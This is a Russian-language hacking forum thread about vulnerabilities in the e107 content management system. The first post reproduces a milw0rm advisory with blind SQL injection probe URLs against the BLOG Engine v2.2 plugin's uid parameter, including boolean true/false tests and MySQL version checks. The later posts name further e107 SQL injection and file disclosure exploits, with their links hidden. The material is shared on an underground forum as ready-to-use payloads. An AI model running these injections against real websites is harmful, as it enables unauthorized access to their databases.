Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor


[ Уязвимости e107 ]


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 4

#1
aka PSIH

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability

exp:

Цитата

[-]note=becuse e107 using diffrent prefix/table names it's impossible to writting exploit for it :(

]]>http://site.com/e107...ublog.php?uid=1]]> and 2>1/*   #the page fully loaded

]]>http://site.com/e107...ublog.php?uid=1]]> and 1>3/*   #page loaded whit any data and some error that say "The user has hidden their blog."

cheking the mysql version:
]]>http://site.com/e107...ublog.php?uid=1]]> and substring(@@version,1,1)=5
or
]]>http://site.com/e107...ublog.php?uid=1]]> and substring(@@version,1,1)=4

©milw0rm.com
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********

#2
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений

Ссылки из под хайдов не выдаю!


#3
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
e107 Plugin userjournals_menu (blog.id) SQL Injection Vulnerability

Ссылки из под хайдов не выдаю!


#4
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit

Ссылки из под хайдов не выдаю!


#5
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit

Ссылки из под хайдов не выдаю!



Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных